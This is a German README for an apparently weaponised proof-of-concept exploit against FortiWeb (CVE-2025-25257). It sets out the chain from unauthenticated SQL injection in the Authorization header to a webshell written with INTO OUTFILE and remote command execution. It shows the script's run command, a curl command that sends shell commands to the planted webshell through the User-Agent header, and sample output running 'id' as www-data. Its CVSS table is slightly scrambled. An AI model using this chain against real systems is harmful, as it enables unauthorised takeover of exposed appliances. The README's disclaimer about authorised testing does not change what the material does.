
PoC für CVE-2025-25257, eine kritische nicht authentifizierte SQL-Injection in FortiWeb. Nutzt SQLi über den Authorization-Header aus, um eine Webshell zu schreiben und RCE zu erlangen. Kein Login erforderlich. Vollständig automatisiert.
Kritische SQL-Injection → Webshell-Ausführung
Entdeckt und bewaffnet von 0xgh057r3c0n
CVE-2025-25257 betrifft FortiWeb-Systeme, die den Endpunkt /api/fabric/device/status bereitstellen, bei dem die Eingabe des Authorization-Headers nicht ordnungsgemäß bereinigt wird.
Ein Angreifer kann eine nicht authentifizierte SQL-Injection durchführen, um eine Webshell auf den Server zu schreiben und Befehle remote auszuführen.
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>
INTO OUTFILE zum Ablegen einer Shellpython3 CVE-2025-25257.py -t https://target-host.com
Anschließend:
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
requests-ModulInstallation:
pip install requests
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)
[+] Webshell Ready:
> https://target-host.com/cgi-bin/x.cgi
> Send commands via User-Agent header
| Metrik | Wert |
|---|---|
| Basiswert | 9.8 (KRITISCH) |
| Angriffsvektor | Netzwerk |
| Erforderliche Berechtigungen | Keine |
| Benutzerinteraktion |
0xgh057r3c0n 🔗 github.com/0xgh057r3c0n
Dieser Proof-of-Concept dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Nutzung auf eigenes Risiko. Der Autor übernimmt keine Verantwortung für Missbrauch.
| Keine |
| Auswirkung | Hoch (C/I/A) |